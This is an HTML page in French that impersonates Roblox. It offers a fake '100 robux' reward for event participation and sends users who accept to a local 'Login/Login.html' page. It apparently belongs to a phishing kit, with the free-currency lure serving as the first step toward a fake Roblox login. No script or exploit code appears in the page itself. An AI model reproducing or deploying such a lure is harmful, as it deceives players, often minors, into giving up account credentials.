<!DOCTYPE html>
    <html>
    <head>
    <title>Roblox | Récompense</title>
    <meta charset="utf-8">
    <link rel="icon" href="Login/do.si/Logo.png">
    <style>
    body {
    font-family:sans-serif;
    text-align:center;
    background:#1f1f1f;
    }
    h2 {
    background:#2b2b2b;
    color:#FFFFFF;
    }
    h1 a {
    background:#666666;
    color:#FFFFFF;
    }
    a {
    text-decoration: none;
    }
    .js-alert {
        padding: 15px;
        margin: 5px;
        background: #f3e631;
        color: black;
        font-size: large;
    }
    .SB {
        padding: 20px;
        color: rgb(0, 80, 24);
    }
    .SBN {
        padding: 20px;
        color: rgb(80, 0, 0);
    }
    p {
        color: aliceblue;
    }
    </style>
    </head>
    <body>
    <br><noscript class="js-alert">Alerte : Your Browser Not Have JS For better performence !</noscript>
    <h2>Récompense Des event de roblox :</h2>
    <br><h2>Merci pour votre participation dans notre event (the HUNT et Roblox Classics)</h2>
    <p>Voici 100 robux de récompence</p>
    <br><h1><a href="Login/Login.html" class="SB">Merci !</a></h1><h1><br><a href="https://roblox.com" class="SBN">Non Merci</a></h1>
    <br><p>____________________________________________________________________________________________________________________________________________________________</p>
    <br><p><a href="https://en.help.roblox.com/hc/fr/articles/115004647846-Conditions-d-utilisation-de-Roblox"> Roblox Corporation </a> | <a href="https://corp.roblox.com/"> a propos </a></p>